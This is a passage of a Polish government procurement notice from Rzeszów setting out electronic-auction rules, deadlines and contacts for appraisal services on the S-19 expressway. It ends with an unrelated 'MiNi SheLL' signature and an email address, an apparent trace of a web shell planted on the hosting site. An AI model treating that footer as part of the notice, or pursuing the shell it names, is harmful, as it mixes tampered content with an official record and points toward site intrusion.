<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1. W toku licytacji elektronicznej Wykonawcy składają kolejne korzystniejsze postąpienia. Możliwość złożenia postąpienia istnieje od otwarcia licytacji do jej zamknięcia. 2. Oferta złożona w toku licytacji przestaje wiązać gdy inny Wykonawca złożył ofertę korzystniejszą. 3. W toku licytacji Wykonawcy proponują rzeczywistą cenę oferty brutto wyrażoną w złotych oraz ewentualnie w groszach; grosze należy oddzielić od złotych kropką. 4. Oferta złożona przez Wykonawcę winna być niższa od oferty najkorzystniejszej co najmniej o kwotę minimalnego postąpienia. 5. W toku licytacji Zamawiający za pośrednictwem platformy licytacyjnej na bieżąco będzie przekazywał wszystkim Wykonawcom informacje o pozycji złożonych
przez nich ofert, liczbie Wykonawców biorących udział w licytacji elektronicznej, a także o cenach złożonych ofert, z tym że do momentu zamknięcia licytacji nie ujawni informacji umożliwiających identyfikację Wykonawców. 6. Zamawiający przyjął za cenę wywoławczą brutto za całość zamówienia: 261.450,00 PLN. 7. Zamawiający udzieli zamówienia Wykonawcy, który zaoferuje najniższą cenę brutto za całość przedmiotu zamówienia. 8. Niezwłocznie po zakończeniu licytacji Zamawiający, za pośrednictwem platformy licytacyjnej, poinformuje zwycięzcę o przyjęciu jego oferty. 9. Minimalna wysokość postąpienia 100.00 PLN.</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> 60 minut</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 20.02.2015 godzina 10:00, miejsce: PUW w Rzeszowie ul. Grunwaldzka 15, 35-959 Rzeszów sekretariat Wydziału Organizacyjno-Administracyjnego, pok. nr 205 (II p.). Termin dot. także ofert składanych drogą pocztową.</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> 5 dni po terminie przekazania zaproszeń, o godzinie 10:00..</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>Upływa 5 minut po złożeniu ostatniego postąpienia</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>nie dotyczy</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Istotne postanowienia umowy zawarte są w części A, dostępnej na stronie bip.rzeszow.uw.gov.pl, zakładka Ogłoszenia - Zamówienia publiczne (Profil nabywcy)</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PRZEKAZANIE WNIOSKU O DOPUSZCZENIE DO UDZIAŁU W LICYTACJI: Wniosek (zgodny ze wzorem stanowiącym zał. B do ogłoszenia zamieszczonego na stronie BIP Zamawiającego) należy umieścić w zamkniętym opakowaniu, uniemożliwiającym odczytanie zawartości bez uszkodzenia tego opakowania.
Opakowanie winno być oznaczone nazwą (firmą) i adresem Wykonawcy, zaadresowane na Podkarpacki Urząd Wojewódzki w Rzeszowie ul. Grunwaldzka 15, 35-959 Rzeszów, sekretariat Wydziału Organizacyjno - Administracyjnego (II piętro, p. 205), oraz opisane - Wniosek o dopuszczenie do udziału w licytacji elektronicznej na usługi biegłych - rzeczoznawców majątkowych w zakresie szacowania, do celów ustalenia odszkodowania za nieruchomości położone na terenie województwa podkarpackiego, które zostaną przejęte na rzecz Skarbu Państwa na podstawie decyzji zezwalającej na realizację inwestycji drogowej, dot. budowy drogi ekspresowej S-19 na odcinku Sokołów Młp. Płn. - Stobierna, znak sprawy OA-XVI.272.7.2015. We wniosku Wykonawca zobowiązany jest przekazać numer faksu oraz adres e-mail, na które będę kierowane zaproszenia do udziału w licytacji elektronicznej. Osoby uprawnione do porozumiewania się z wykonawcami: W sprawach technicznych: Joanna Kruczek - starszy specjalista w Wydziale Nieruchomości, pok. nr 341, tel. (17) 867 13 41, w godz. od 8:00 do 15:00. W sprawach formalno - prawnych: Krzysztof Mędrygał - Kierownik Oddziału w Wydziale Organizacyjno-Administracyjnym, tel. 17 867 12 26, w godz. od 8:00 do 15:00., Kazimiera Pajda - starszy specjalista w Wydziale Organizacyjno-Administracyjnym, pok. nr 207 tel. (17) 867 12 07, w godz. od 8:00 do 15:00, Piotr Galas - starszy specjalista w Wydziale Organizacyjno -Administracyjnym, tel. 17 867 12 08, w godz. od 8:00 do 15:00. e-mail do kontaktów z Zamawiającym: zamowienia@rzeszow.uw.gov.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com